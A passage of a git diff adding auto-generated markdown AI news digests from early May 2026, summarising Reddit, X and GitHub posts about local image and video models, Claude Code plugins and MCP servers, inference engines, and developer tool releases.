you end up trimming, resizing, fixing frames, adding captions… just a lot of repetitive work. So I built a tool for myself over the weekend to deal with it. It’s fully open source. Runs local-first with a simple UI + FastAPI backend, uses FFmpeg underneath. You basically drop your raw videos and it just handles all that stuff. Checks what’s wrong, fixes it, lets you tweak things if needed, and gives you a clean dataset ready for training. Also gives you a good level of control across the whole pipeline, so you’re not locked into rigid preprocessing. It also has bulk captioning feature across the dataset. Currently it supports LTX and WAN, and I’ll be adding support for more models soon. Been using it myself and it made things way smoother, so putting it out. Also I keep building similar small open source tools like this and putting them out. You’ll… + +--- + +## [I made an easy to use OPEN SOURCE, beautiful UI wrapper for ComfyUI without the node graph](https://reddit.com/r/StableDiffusion/comments/1t2s1yp/i_made_an_easy_to_use_open_source_beautiful_ui/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: open_source + +> soo I got into local ai image generation and saw that there was no truly simple generators that just had beautiful views for generating images, no complex stuff, so I decided to make my own and open source it of course on github the backend is fully comfyUI, but it has no node graphs, it just uses it because I love the backend and it works much easier then anything else for this I would love to have people review and contribute/find issues for this, heres some images of it but basically its called J AI Studio, and ive stripped it back to be as simple yet still great as possible, for anyone new to ai image gen OR just people who want less clutter/ugly UI's heres the github and some pics of it [https://github.com/jasperdevs/J-AI-Studio](https://github.com/jasperdevs/J-AI-Studio) [Main view](https://preview.redd.it/t786wcnikyyg1.png?width=1657&format=png&auto=webp&s=1900054e0ff13b094050769f15ab441ad0a13243) [\\"Zen Mode\\"](https://preview.redd.it/550ak82jkyyg1.png?width=1660&format=png&auto=webp&s=bdca9741ce07aecb6f6c6a179be0e4a0f4116b24) [Fullscreen on an image](https://preview.redd.it/p4spphgkkyyg1.png?width=1328&format=png&auto=webp&s=18f2c3442… + +--- + +## [Can I ask a noob question?](https://reddit.com/r/StableDiffusion/comments/1t2rilm/can_i_ask_a_noob_question/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: open_source + +> Hello all, I am extremely new to this AI video generation realm. Till now I was just generating images with Gemini (nano banana). While looking for video generations I saw higgsfield and eleven labs, but I can't pay for the steep prices. While looking for open source options, I found this sub. I have seen mentions of LTX and Wan for video generations. Does this sub has a beginner guide or something? If not can anyone guide me onto making good AI videos for instagram? Thank you. + +--- + +## [Built a local LLM inference engine on CachyOS — runs faster than llama.cpp on my 9070 XT](https://reddit.com/r/StableDiffusion/comments/1t2nm4u/built_a_local_llm_inference_engine_on_cachyos/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: cli_tool + +> Hey folks, we've been hacking on a Vulkan-based LLM engine the last few weeks, figured I'd share since I'm running it exclusively on CachyOS with Mesa RADV. It's called VulkanForge — single 14 MB Rust binary, no Python, no ROCm, just pure Vulkan compute shaders. Runs GGUF models (Q4\_K\_M etc.) and also native FP8 SafeTensors which llama.cpp can't even load. Some numbers on my RX 9070 XT (RADV Mesa 26.0.6): * Qwen3-8B Q4\_K\_M: 134 tok/s decode (llama.cpp does \~129) * Mistral-7B: 132 tok/s (llama.cpp \~124) * Native FP8 Llama-3.1-8B: 68 tok/s in 7.5 GB VRAM Everything works out of the box on CachyOS — just `cargo build --release` and go. No weird driver hacks needed, fish shell works fine too lol. GitHub: [https://github.com/maeddesg/vulkanforge](https://github.com/maeddesg/vulkanforge) Happy to answer questions if anyone wants to try it on their RDNA4 setup. + +--- + +## [Side-by-side comparison of Qwen-Image, ERNIE Base/Turbo, and FLUX.2 Dev across 8 custom styles (single RTX 5090)](https://reddit.com/r/StableDiffusion/comments/1t2nkkt/sidebyside_comparison_of_qwenimage_ernie/) +*Reddit r/StableDiffusion* | 03/05/2026 | Score: 1.00 +Tags: open_source + +> Hey folks. I've been playing around at home picking which open-source image model to settle on for some prototyping work, and ended up doing a fun little side-by-side that maybe someone else will find useful. Same prompt and same seed across four models, with eight different style presets (AI generated). Completely amateur — no benchmarking rigor, just curiosity and a free weekend. # Tested models * **Qwen-Image-2512** (BF16) with **Qwen2.5-VL-7B** NVFP4 scaled text encoder * **ERNIE-Image Base** (BF16) with **Ministral 3 3B** text encoder * **ERNIE-Image Turbo** (BF16, 8-step DMD-distilled) with **Ministral 3 3B** text encoder * **FLUX.2 Dev** (NVFP4 mixed) with **Mistral 3 Small** (flux2 type, FP4 mixed) text encoder # Hardware * **GPU**: NVIDIA RTX 5090 (32 GB VRAM) * **CPU**: AMD Ryzen 9 9950X3D * **RAM**: 64 GB DDR5 # Notes Settings are whatever I found ideal for my hardware after a fair bit of trial and error — these are not necessarily community defaults, just what worked best on my machine. * **Qwen-Image** and **FLUX.2 Dev NVFP4** both spill heavily into system RAM during inference. They fill almost the entire VRAM and most of the system RAM at once. * **Qwen-Image-2512**… + +--- + +## [@Scobleizer Shares Full Resume of AI Industry Work in Response to Being Challenged](https://x.com/Scobleizer/status/2050740859789103142) +*Aligned News (Scoble)* | 03/05/2026 | Score: 1.00 +Tags: product_launch + +> Scoble summarized his AI industry credentials: most complete X lists, alignednews.com news service, entrepreneur interviews, multiple company launches, and eight books about the future. The response provides a concise overview of his information infrastructure and editorial brand. + +--- + +## [What if ChatGPT launched in 1998](https://reddit.com/r/ChatGPT/comments/1t2l80n/what_if_chatgpt_launched_in_1998/) +*Reddit r/ChatGPT* | 03/05/2026 | Score: 1.00 +Tags: tool_update + +> Saw the Wikipedia premium screenshot and it got me thinking… Enjoy ✌️ + +--- + +## [Set up multi-agent orchestration with Claude Code as the boss... am I overcomplicating this?](https://reddit.com/r/ClaudeAI/comments/1t2i664/set_up_multiagent_orchestration_with_claude_code/) +*Reddit r/ClaudeAI* | 03/05/2026 | Score: 1.00 +Tags: cli_tool + +> Pretty new to AI but been deep on a side project for a while now. Got tired of one Claude session running out of context halfway through anything serious, so I rigged up an orchestration thing. Working well enough but I have no idea if I'm just reinventing the wheel. Setup looks like this: ( Please note it's work paying for all these , I wouldn't be spending my own money having this many agents etc ) **Main orchestrator**: Claude Code running Opus 4.7 (1M context, high effort) Premium team seat. This one talks to me, plans the work, reviews everything that comes back, decides what to fan out. Anything sensitive (auth, payments, db migrations, anything where conversation history matters) it does itself. **Subagents :** all called from bash via wrapper scripts in ./agents/: * **claude-sub** : another Claude Code (Opus 4.7 High) premium team seat on a worker account so my main quota isn't drained. Fresh context. Used for "review your own diff with fresh eyes" or well-specified subtasks. * **codex:** GPT-5.5 via Codex CLI. Team plan . Mostly the per-task reviewer with mocks attached via --image. * **codex-sub:** GPT-5.5 via Codex CLI. Team plan. Because with work I have the two accoun… + +--- + diff --git a/data/digest-2026-05-04.md b/data/digest-2026-05-04.md new file mode 100644 index 0000000..8b98428 --- /dev/null +++ b/data/digest-2026-05-04.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-04** | 15 stories | Auto-generated from 617 archived stories + +--- + +## [Local MCP server that tells Claude Code what would break before it edits a file (raysense, MIT, free)](https://reddit.com/r/ClaudeAI/comments/1t3jhnz/local_mcp_server_that_tells_claude_code_what/) +*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool, tool_update + +> A pattern I keep hitting in Claude Code: I ask the agent to refactor something modest -- a parsing utility, a helper, a config loader -- and the diff it produces looks fine. Tests in the file pass. I run CI and three unrelated tests blow up. Sometimes the broken caller is code I have not touched in months. The agent is not careless. It read the file. What it could not do was *see the codebase*: the dependency graph, the call sites, the modules that lean on each other, the cycles, the test coverage of each piece. Plain text never reveals this. You cannot grep your way to "what would break if I delete this function." We built **raysense** to close that gap. It is a single Rust binary + Claude Code plugin + stdio MCP server that gives Claude structural memory of your codebase. **Free, MIT-licensed, local-only -- no SaaS, no API key, no telemetry.** It ships from crates.io and builds from source on first install, so the only prerequisite is a Rust toolchain (`cargo`) on the machine. If you don't have it yet: ``` curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh ``` After that, `cargo install raysense` is the whole installation. (Disclosure: I am part of the team behind it… + +--- + +## [claudely: launch Claude Code against Local LLM provider like LM Studio / Ollama / llama.cpp without trashing your real claude config](https://reddit.com/r/ClaudeAI/comments/1t38e7c/claudely_launch_claude_code_against_local_llm/) +*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 +Tags: api_update, mcp, developer_tool, cli_tool + +> Plenty of CLI coding agents will talk to a local LLM, but the catch is the ecosystem. Skills, slash commands, MCP servers, plugins, hooks: all the interesting tooling has been built specifically for Claude Code, and parity on every other agent is patchy at best. Trying to reuse a Claude-shaped workflow on a different agent quickly turns into "rewrite all the plugins" or "do without." claudely skips that fight. You keep Claude Code as the client (and its whole plugin / skill / MCP ecosystem with it), and just point it at a model running on your own hardware. Pick a provider, claudely spawns \`claude\` with the right base URL, auth, and cache fix wired up for that one session. Your shell and the regular \`claude\` command stay untouched, so you can flip between local and the real Anthropic API without thinking about it. It also quietly fixes a prompt-cache bug that otherwise tanks local-model speed by \~90%, and handles the per-provider env-var differences for you. Works with LM Studio, Ollama, llama.cpp, or any Anthropic-compatible endpoint (point it at a litellm or claude-code-router proxy for OpenAI-protocol backends like vLLM). npm i -g claudely claudely # LM Studio, picker over… + +--- + +## [Releasing the Data Analyst Augmentation Framework (DAAF) version 2.1.0 today -- still fully free and open source! In my very biased opinion: DAAF is now finally the best, safest, AND easiest way to get started using Claude Code for respons…](https://reddit.com/r/ClaudeAI/comments/1t3ryo1/releasing_the_data_analyst_augmentation_framework/) +*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 +Tags: open_source, developer_tool, tool_update + +> https://preview.redd.it/o74lppqd86zg1.png?width=1456&format=png&auto=webp&s=3a904bae42b8130e2c6382be55debe8f6ef4d6ca When I launched the Data Analyst Augmentation Framework [v2.0.0 six weeks ago](https://daafguide.substack.com/p/daaf-v200-is-finally-here-from-usable), I wrote that the major update was about going “from usable to useful” -- rebuilding the orchestrator system for maximum flexibility and efficiency, adding a variety of more responsive engagement modes, and deepening the roster of methodological knowledge that DAAF could pull upon as needed for causal inference, geospatial analysis, science communication and data visualization, supervised and unsupervised machine learning, and much, much more. But while DAAF continued to get more capable and more useful for those actually using it… Well, it was still extremely annoying to use, generally obtuse, and hard to get started with, which means a lot of people who were interested were simply bouncing off of it. **That all changes with the v2.1.0 update**, which I’m cheekily calling the Frictionless Update for three key reasons: # 1. Installation happens in one line now From a fresh computer to talking with a DAAF-e… + +--- + +## [Top 6 Claude Skills: 15th April to 3rd May](https://reddit.com/r/ClaudeAI/comments/1t3qmqy/top_6_claude_skills_15th_april_to_3rd_may/) +*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> Found some Open Source Claude skills from last 15 days. Some of them are pretty decent to use, personally liked the npm downloads one. Check out: **- brand-alchemy:** A brand strategy and naming skill that interrogates your thoughts for branding first, then applies phonosemantics, category design frameworks, and auto-checks domain availability across any TLD. **- npm-downloads-to-leads:** Give it a list of npm packages. It pulls 12 weeks of download data, scores each one by growth velocity, maps maintainers to GitHub and X, and gives you a ranked lead brief who built it, how to reach them, and what to say. **- hyperframes:** Write HTML, render video. Built for agents. Handles HTML-to-video rendering with ffmpeg, GSAP animations, and puppeteer automation great for auto-generating video content from code. **- email-newsletter:** Draft and design a complete HTML email newsletter from a topic or content brief. Paste-ready output for Loops, Mailchimp, Beehiiv, Resend, and most email platforms. **- pricing:** Help figure out pricing for a product or service using minimalist entrepreneur principles. Comes straight from the book 'The minimalist Entrepreneur" playbook cost-based, value-bas… + +--- + +## [built a plugin so my parallel Claude Code sessions can message each other instead of me alt-tabbing](https://reddit.com/r/ClaudeAI/comments/1t3osat/built_a_plugin_so_my_parallel_claude_code/) +*Reddit r/ClaudeAI* | 04/05/2026 | Score: 1.00 +Tags: mcp, developer_tool + +> I usually have two or more Claude Code sessions open at once. One in the backend repo, one in the frontend. Half the time I'd be in the frontend asking "wait, what shape did the user object end up as?", then alt-tab, ask the backend session, copy the answer, alt-tab back, paste. The other Claude was right there. It already knew. I was the bottleneck. So I wrote a plugin called Relay. In the frontend window I just say: ▎ask the backend session what the user object looks like The backend session sees the question between turns, answers it, and the reply pops up in my frontend session as a notification. No window switching. No copy-paste. Works for broadcasts too, like "ask everyone what they're working on", and the replies trickle in one at a time. The mechanism is simpler than it sounds. Claude Code shipped a channels capability a while back that lets MCP servers push messages into a session between turns. Relay piggybacks on that. Each session runs a tiny MCP server, a single hub daemon on your machine routes between them over a unix socket, and inbound asks land as channel notifications so Claude reacts to them naturally on its next turn. First session you start spawns the hub. I… + +--- + +## [Your Claude Code agent is always working from stale context. I built it a fix it can rewind, replay, and stay ahead of every edit.](https://reddit.com/r/ClaudeAI/comments/1t3du61/your_claude_code_agent_is_always_working_from/) +*Reddit r/ClaudeAI* | 04/05/2026 | Score: 0.99 +Tags: api_update, agent_tool + +> Every long Claude Code session has the same hidden failure mode: the agent is always working from stale context. It re-reads the same 12 files across three sessions to "remind itself" of an interface you already showed it. It refactors getUserById without checking who calls it. It edits a config with no memory of why the previous version was that way. It's not the context window. The window is fine. There's no persistent, time-aware representation of your codebase for the agent to re-query. So it guesses. And you pay tokens for every re-read. I built Memtrace to fix exactly this. Two things it does that no other memory tool does: **(1) Always-fresh state.** Every edit you make triggers a 42ms incremental snapshot of the changes applied by the coding agent. The agent's memory is never one-session-old. After a refactor it knows the blast radius before you do: every caller, every test, every consumer of the function you just touched. Your agent stops asking "what does getUserById return?" 30 seconds after seeing it. **(2) Rewind and replay.** This is the part nobody else has. Your codebase is stored bi-temporally so every change becomes a recallable episode. When the agent debugs a r… + +--- + +## [ChatGPT’s fixation on my past conversations has made it borderline unusable](https://reddit.com/r/ChatGPT/comments/1t35tbg/chatgpts_fixation_on_my_past_conversations_has/) +*Reddit r/ChatGPT* | 04/05/2026 | Score: 0.96 +Tags: github_release, tool_update + +> in the past, I feel like I could count on coming to ChatGPT and, generally speaking, get the “best“ answer when I asked a question or wanted to explore an idea. for some time now, this is no longer the case. At some point, chat became so obsessed with everything it knows about me that it seems to be no longer capable of providing the best answer. it just provides answers that relate to things I’ve mentioned in the past, answers that include interests I’ve told it about, answers that continue/build on previous ideas that I’ve explored, etc. overly simplified example: going to chat and asking for the best album or book of 2026, and getting an answer that is entirely based on the literary or musical interests that I’ve told it about in the past. sometimes (most times???) I just want answers “in a vacuum” - I don’t want my biases or my interests informing the response. it’s become a serious problem when you’re trying to explore creative ideas or use the tool to think about something in a novel way, and it’s just digging for things that it can say that relate to your past conversations at all costs instead. its like a new version of the “people pleasing“ that we were all griping about… + +--- + +## [Turbo v2.9.9 released](https://github.com/vercel/turborepo/releases/tag/v2.9.9) +*GitHub Releases · Turbo* | 04/05/2026 | Score: 0.92 +Tags: github_release, tool_update + +> ## What's Changed ### Changelog * release(turborepo): 2.9.8 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12700 * fix: Remove Unix parent death watchdogs by @anthonyshew in https://github.com/vercel/turborepo/pull/12699 * release(turborepo): 2.9.9-canary.1 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12705 * fix: Scope repo index prefixes to Git root by @anthonyshew + +--- + +## [pnpm v11.0.5 released](https://github.com/pnpm/pnpm/releases/tag/v11.0.5) +*GitHub Releases · pnpm* | 04/05/2026 | Score: 0.92 +Tags: github_release, cli_tool + +> ## Patch Changes * Drop the `darwin-x64` artifact from `@pnpm/exe` and from the GitHub release page. The Node.js SEA mechanism `pnpm pack-app` uses produces a binary that segfaults at startup on Intel Macs because of an upstream Node.js bug ([nodejs/node#62893](https://github.com/nodejs/node/issues/62893), tracked alongside [#59553](https://github.com/nodejs/node/issues/59553); the Node.js team has [opted not to fix it](https://github.com/nodejs/node/pull/60250) on the grounds that x64 macOS + +--- + +## [A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo.](https://reddit.com/r/StableDiffusion/comments/1t3rd6m/a_new_open_weights_image_model_appears_in/) +*Reddit r/StableDiffusion* | 04/05/2026 | Score: 1.00 +Tags: open_source + +> A new open weights image model appears in ArtificialAnalysis. Outperforming Flux.2 Pro and Z Image Turbo. + +--- + +## [Machines Are Getting Onchain Passports and Credit Ratings Now — peaqOS Is Live](https://x.com/peaq/status/2051288009081782473) +*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 +Tags: tool_update + +> peaq launched peaqOS, giving physical machines verifiable digital identities, passports, and credit ratings recorded on-chain. The company also welcomed its first non-human team member. The machine economy is not a future concept anymore. + +--- + +## [AI Invented a Math Framework. Humans Used It to Solve Two 60-Year-Old Conjectures](https://x.com/WesRoth/status/2051300819878936591) +*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 +Tags: developer_tool + +> An AI-generated mathematical framework originally used to solve Erdős Problem 1196 has now been generalized to prove a second 60-year-old conjecture. The model did not assist the discovery. It was the discovery. + +--- + +## [Cursor Team Kit Just Released — The Internal Skills the Cursor Team Uses to Build Cursor](https://x.com/ericzakariasson/status/2051255780167610522) +*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 +Tags: cli_tool + +> The Cursor engineering team open-sourced Cursor Team Kit, containing the internal slash commands they use to build the Cursor editor at Cursor. It includes verify-this, fix-merge-conflicts, pr-review-canvas, and cli-automation-harness. + +--- + +## [Ace-Step-1.5-Api-server-UI](https://reddit.com/r/StableDiffusion/comments/1t39bjl/acestep15apiserverui/) +*Reddit r/StableDiffusion* | 04/05/2026 | Score: 1.00 +Tags: api_update + +> [Ace-Step-1.5-Api-server-UI](https://github.com/tritant/Ace-Step-1.5-Api-server-UI) # Features [](https://github.com/tritant/Ace-Step-1.5-Api-server-UI#features) * **Compose** — Text-to-music generation with full parameter control * **Cover** — Style transfer from a reference audio * **Repaint** — Selective region editing with WaveSurfer timeline * **Base ★** — Exclusive Base model modes: * 🧱 **Lego** — Add a specific instrument track to an existing mix * 🔬 **Extract** — Isolate a stem from a mix * 🎹 **Complete** — Generate accompaniment for an existing track * Multi-track timeline with per-track solo/mute/volume * Persistent configuration via localStorage * Batch generation support * Multi lora support + +--- + +## [Meta Abandons Open Source — Days After LlamaCon](https://x.com/thenewstack/status/2050017453615301067) +*Aligned News (Scoble)* | 04/05/2026 | Score: 1.00 +Tags: open_source + +> Meta abandoned open-source Llama for proprietary Muse Spark just days after LlamaCon celebrated one billion downloads, a dramatic reversal with major implications for the AI developer community. + +--- + diff --git a/data/digest-2026-05-05.md b/data/digest-2026-05-05.md new file mode 100644 index 0000000..d14aac4 --- /dev/null +++ b/data/digest-2026-05-05.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-05-05** | 15 stories | Auto-generated from 540 archived stories + +--- + +## [torch-nvenc-compress: GPU NVENC silicon as a PCIe bandwidth multiplier — PCA + pure-ctypes Video Codec SDK wrapper. Parallel-path overlap measured at 67% of theoretical max on a real GEMM + encode workload. [P]](https://reddit.com/r/MachineLearning/comments/1t2zy4h/torchnvenccompress_gpu_nvenc_silicon_as_a_pcie/) +*Reddit r/MachineLearning* | 03/05/2026 | Score: 1.00 +Tags: api_update, open_source, developer_tool, tool_update + +> I've been working on the consumer-multi-GPU PCIe bottleneck — Nvidia removed NVLink from the 4090/5090, and splitting a 70B model across two consumer cards drops you to \~30 GB/s over PCIe peer-to-peer. Spent the last few months building a Python library that uses the GPU's otherwise-idle NVENC/NVDEC silicon to compress activations and KV cache on the fly, then ships the small bitstream across the same wire. **Repo:** [https://github.com/shootthesound/torch-nvenc-compress](https://github.com/shootthesound/torch-nvenc-compress) (Apache 2.0) # Prior art (this isn't novel as an idea) * **LLM.265 — "Video Codecs are Secretly Tensor Codecs"** (late 2025). The closest direct precedent: same insight applied to LLM weights, activations, KV cache. * **KVFetcher** (April 2026). KV compression for remote prefix fetching. * **CodecFlow** (April 2026). Codec motion-vector metadata for KV refresh during prefill. The "video codec on tensors" idea was already in the literature when I started. What's added in this work: 1. **PCA + rank-truncation as preprocessing.** Activations and KV in their standard basis are noise-like (\~4× compression floor, basically the Gaussian-noise limit). The PCA basis… + +--- + +## [Released a TurboQuant-compatible KV backend evaluation SDK](https://reddit.com/r/LocalLLaMA/comments/1t4ls7i/released_a_turboquantcompatible_kv_backend/) +*Reddit r/LocalLLaMA* | 05/05/2026 | Score: 1.00 +Tags: api_update, developer_tool, tool_update + +> Disclosure: I am the author of this evaluation SDK. I released an independent TurboQuant-compatible KV backend evaluation package for compressed-KV ABI testing, smoke tests, and partial attention decode experiments. The goal is narrow: test whether compressed KV-cache workloads can be routed through a clean low-level backend ABI for: \- compressed KV block registration \- KV dot / QK partial execution \- block-local attention partial decode \- capability probing \- fallback and correctness reporting \- minimal benchmark validation Repository: [https://github.com/ixu2486/tq\_compat\_eval](https://github.com/ixu2486/tq_compat_eval) This is not a Google project, not an official TurboQuant implementation, and not a replacement for TurboQuant, llama.cpp, or existing model runtimes. It is also not the full RetryIX runtime. The private runtime, scheduling policy, hardware-interface contracts, and internal routing logic are not included. I would appreciate feedback from people working on KV-cache optimization, quantized inference, compressed-KV formats, long-context decoding, or backend integration. + +--- + +## [Node.js v26.0.0 released (MAJOR UPDATE)](https://github.com/nodejs/node/releases/tag/v26.0.0) +*GitHub Releases · Node.js* | 05/05/2026 | Score: 1.00 +Tags: api_update, github_release, cli_tool + +> We're excited to announce the release of Node.js 26! Highlights include the Temporal API enabled by default, updates to the V8 JavaScript engine to 14.6, Undici to 8.0, and several important deprecations and removals as we continue to modernize the platform. As a reminder, Node.js 26 will enter long-term support (LTS) in October, but until then, it will be the "Current" release for the next six months. We encourage you to explore the new features and benefits offered by this latest release a + +--- + +## [Anthropic ships Claude for Creative Work with nine MCP-native connectors](https://reddit.com/r/ClaudeAI/comments/1t48vtx/anthropic_ships_claude_for_creative_work_with/) +*Reddit r/ClaudeAI* | 05/05/2026 | Score: 1.00 +Tags: mcp, developer_tool, tool_update + +> Anthropic announced Claude for Creative Work on April 28. The release includes nine official connectors that plug Claude into professional creative software, with a native Blender connector as the flagship. All nine are built on the Model Context Protocol (MCP), so Claude can read live project state and execute actions directly inside each app rather than operating through copy-paste workflows. The MCP piece is what makes this more than a plugin announcement. This is one of the first production-scale deployments where an LLM maintains persistent context within a host application's own data model. If the pattern holds up, it probably becomes the template for how agents integrate with domain-specific software more broadly. What creative tools would benefit most from this kind of native agent integration? I'd guess video editing is high on the list, but curious what others think. Announcement: [https://www.anthropic.com/news/claude-for-creative-work](https://www.anthropic.com/news/claude-for-creative-work) + +--- + +## [Offload routine Claude Code work to Gemma 4 through the Google GenAI API](https://reddit.com/r/ClaudeAI/comments/1t4sj9u/offload_routine_claude_code_work_to_gemma_4/) +*Reddit r/ClaudeAI* | 05/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> The idea of offload-mcp is simple: instead of running hardware-hungry local models for routine work, let Claude offload that work to FREE model APIs and SAVE tokens. I’m using Gemma via the Google GenAI API because I like it in my processing pipelines, but running it locally on my MacBook Air is slow and resource-limited. The API path is much more practical for small jobs. I didn't find any other tool on GitHub or elsewhere to handle that. offload-mcp takes care of commit messages, PR summaries, translations, docstrings, source diff/file summaries, and freeform prompts. Freeform is what I use most: send almost any routine prompt to a cheaper model instead of burning expensive Claude Code or Codex context on it. The source-based mode can read local diffs/files directly through the MCP server and reports estimated primary input tokens avoided. The default model chain uses Gemma, but model IDs are configurable. Curious if this fits anyone else’s Claude workflow! GitHub: [https://github.com/peterhadorn/offload-mcp](https://github.com/peterhadorn/offload-mcp) + +--- + +## [Anomaly Detection Belongs in Your Database — built SIMD-accelerated isolation forests into Stratum's SQL engine [P]](https://reddit.com/r/MachineLearning/comments/1t4riem/anomaly_detection_belongs_in_your_database_built/) +*Reddit r/MachineLearning* | 05/05/2026 | Score: 1.00 +Tags: api_update, open_source + +> We added native anomaly detection in Stratum, our columnar analytics engine for the JVM. Train and score isolation forest models entirely from SQL — no Python, no export pipeline: SELECT * FROM transactions WHERE ANOMALY_SCORE('fraud_model') > 0.7; 6 microseconds per transaction, SIMD-accelerated, runs inside the query engine. The full write-up covers why we built it, how isolation forests work, and benchmarks against PyOD/scikit-learn: [https://datahike.io/notes/anomaly-detection-in-your-database/](https://datahike.io/notes/anomaly-detection-in-your-database/) Stratum is open source (Apache 2.0): [https://github.com/replikativ/stratum](https://github.com/replikativ/stratum) Happy to answer questions about the implementation — the isolation forest is pure Java with Vector API SIMD, scoring is fused into the query execution pipeline so it benefits from zone map pruning and chunked streaming. + +--- + +## [Gemini has a big outage going on but refuses to acknowledge on official status page! How do you know if an LLM API is actually down vs just you?](https://reddit.com/r/ClaudeAI/comments/1t4kbpa/gemini_has_a_big_outage_going_on_but_refuses_to/) +*Reddit r/ClaudeAI* | 05/05/2026 | Score: 1.00 +Tags: api_update, mcp + +> Genuine question. Gemini had a 5+ hour outage this morning. I found out because a user reported it on Tickerr, not because Google said anything. Status page was green the whole time. I built Tickerr using Claude Code for this only. It runs independent streaming API calls to LLM providers every 5 minutes and tracks real inference performance - not just HTTP pings. https://preview.redd.it/r6ugn0e57bzg1.png?width=1080&format=png&auto=webp&s=779961c2ee83245f9a46c10ced99f0ddc854494b The other way to know it's not just you is if other people are hitting the same thing at the same time. Which is why I also built a crowdsourced failure signal into [Tickerr.ai](https://tickerr.ai/mcp-server) \- agents report 5xx errors anonymously and get back whether others are seeing the same thing. It's free to try, if you want to add reporting to your agent, three ways depending on your setup: **MCP (Claude Code, Cursor, Windsurf):** report_incident(provider="google", model="gemini-2.5-flash", error_code=503, error_type="overloaded") **REST (any language):** curl -X POST https://tickerr.ai/api/v1/report \ -H "Content-Type: application/json" \ -d '{"provider":"google","model":"gemini-2.5-fla… + +--- + +## [SenseNova-U1-8B-MoT (novel open source multimodal understanding + image generation model) seems like a bigger deal architecturally then it’s getting credit for](https://reddit.com/r/LocalLLaMA/comments/1t4i1yx/sensenovau18bmot_novel_open_source_multimodal/) +*Reddit r/LocalLLaMA* | 05/05/2026 | Score: 1.00 +Tags: open_source, tool_update + +> SenseNova dropped SenseNova-U1 on the last day of April and I’ve only found like one other mostly ignored post on this sub talking about it. It seems like a really exciting novel architecture to me. It appears to be exceptional at text-to-infographics as one of its major high points, as well as being good at image editing, generation, and visual understanding. Supposedly it’s not the traditional mash-up (no VAE) types of multimodal models that we’ve seen before. The following is from their Hugging Face: https://huggingface.co/sensenova/SenseNova-U1-8B-MoT ——— Overview SenseNova U1 is a new series of native multimodal models that unifies multimodal understanding, reasoning, and generation within a monolithic architecture. It marks a fundamental paradigm shift in multimodal AI: from modality integration to true unification. Rather than relying on adapters to translate between modalities, SenseNova U1 models think-and-act across language and vision natively. The unification of visual understanding and generation opens tremendous possibilities. SenseNova U1 sits in the stage of Data-driven Learning (like ChatGPT), yet gestures toward the next stage, that is, Agentic Learning (like Ope… + +--- + +## [Local Dream 2.4.3 - SDXL support, tag autocomplete and more](https://reddit.com/r/StableDiffusion/comments/1t4d7ix/local_dream_243_sdxl_support_tag_autocomplete_and/) +*Reddit r/StableDiffusion* | 05/05/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Local Dream 2.4 was released two weeks ago and has since received three more updates. The main new features: \- SDXL/Illustrious/PonyXL support for Snapdragon 8 Gen 3 and newer (Elite) chips, based on NPU \- Tag autocomplete from CSV import \- Token counter for prompts \- LCM scheduler and many more fixes have been added. It’s worth checking out the release notes for version 2.4! [https://github.com/xororz/local-dream/releases](https://github.com/xororz/local-dream/releases) + +--- + +## [Building a 9-ball AI player: Candidate generation for direct cut shots [P]](https://reddit.com/r/MachineLearning/comments/1t3xplr/building_a_9ball_ai_player_candidate_generation/) +*Reddit r/MachineLearning* | 05/05/2026 | Score: 1.00 +Tags: open_source, developer_tool + +> I'm building a 9-ball-player to help with pattern play. There are many ways to make the next ball, and sometimes in more than one obvious pocket. Which should should you choose depends on probability of making that shot AND ending up in a favorable spot for the next shot, that is also amenable to getting good position for the shot after. To that end, I have built the following components: * A transformer based model that learns p(win) given a table layout. * Candidate shot generator that includes cut shots, bank shots, kick shots, caroms and combination shots as well as safeties. * An evaluator that will pick the best shots based on the p(win) model on the resulting state of each candidate shot. The ground truth: **pooltool** Pool physics is well-modeled but expensive. I use pooltool python library, a solid open-source billiards simulator with accurate ball-cushion-pocket-felt interactions. A single shot takes \~5–15 ms to simulate end-to-end on one CPU thread for the typical 1–3 object-ball layouts that come up in shot evaluation; full racks (9 object balls) push that to \~20–50 ms because there are more pairwise collisions to track. Sounds fast until you do the math. For each la… + +--- + +## [Parax v0.5: Parametric Modeling in JAX [P]](https://reddit.com/r/MachineLearning/comments/1t3jmdc/parax_v05_parametric_modeling_in_jax_p/) +*Reddit r/MachineLearning* | 04/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Hi everyone! Just sharing an update on my project [Parax](https://github.com/gvcallen/parax), which caters for "parametric modeling" in JAX. Previously, Parax was more focused on scientific applications, however I've since generalized it to be a tool useful for any type of JAX work. It now has a strong focus on a clean, extandable API, as well as ensuring the library is entirely **opt-in,** as opposed to its previous versions which took a more framework-like approach. Some of Parax's features: * Derived/constrained parameters with metadata * Computed PyTrees and callable parameterizations * Abstract interfaces for fixed, bounded, and probabilistic PyTrees and parameters * Filtering and manipulation tools The documentation is available [here](https://gvcallen.github.io/parax/) along with some basic examples. Perhaps the package is of use to someone out there! Cheers, Gary + +--- + +## [AutoBe benchmark: structured harness narrows frontier-vs-local gap in backend generation [D]](https://reddit.com/r/MachineLearning/comments/1t3hks9/autobe_benchmark_structured_harness_narrows/) +*Reddit r/MachineLearning* | 04/05/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> AutoBe is a benchmark for end-to-end backend generation. One natural language request produces six outputs: requirements analysis, ERD, OpenAPI spec, E2E tests, NestJS implementation, and a type-safe SDK. Each phase fills a predefined AST via structured function calling rather than generating unstructured code. The scoring rubric is 100 points driven entirely 